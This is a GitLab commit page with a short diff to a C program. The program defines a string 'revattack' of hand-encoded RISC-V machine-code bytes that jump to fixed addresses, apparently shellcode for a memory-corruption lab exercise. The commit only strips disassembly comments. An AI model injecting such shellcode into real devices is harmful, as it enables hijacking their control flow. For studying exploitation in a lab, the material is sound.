Skip to content
Snippets Groups Projects
Commit 31892534 authored by fptk's avatar fptk
Browse files

Rest von Freitag

parent d65103b4
Branches
Tags
No related merge requests found
...@@ -121,10 +121,10 @@ int main(void) { ...@@ -121,10 +121,10 @@ int main(void) {
char *attack = "sBAUM"; char *attack = "sBAUM";
char *revattack = "a" char *revattack = "a"
"\x37\x05\x01\x20" // 0: lui a0,0x20010 "\x37\x05\x01\x20"
"\x13\x05\xc5\x55" // 4: addi a0,a0,1372 # 0x2001055c "\x13\x05\xc5\x55"
"\x13\x0e\x00\x00" // 8: li t3,0 "\x13\x0e\x00\x00"
"\x37\x1e\x01\x20" // c: lui t3,0x20011 "\x37\x1e\x01\x20"
"\x13\x0e\xce\x45" // 10: addi t3,t3,1116 # 0x2001145c "\x13\x0e\xce\x45" // 10: addi t3,t3,1116 # 0x2001145c
"\xe7\x0e\x0e\x00" // 14: jalr t4,t3 "\xe7\x0e\x0e\x00" // 14: jalr t4,t3
"\x13\x00\x00\x00" // 18: nop "\x13\x00\x00\x00" // 18: nop
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Please register or to comment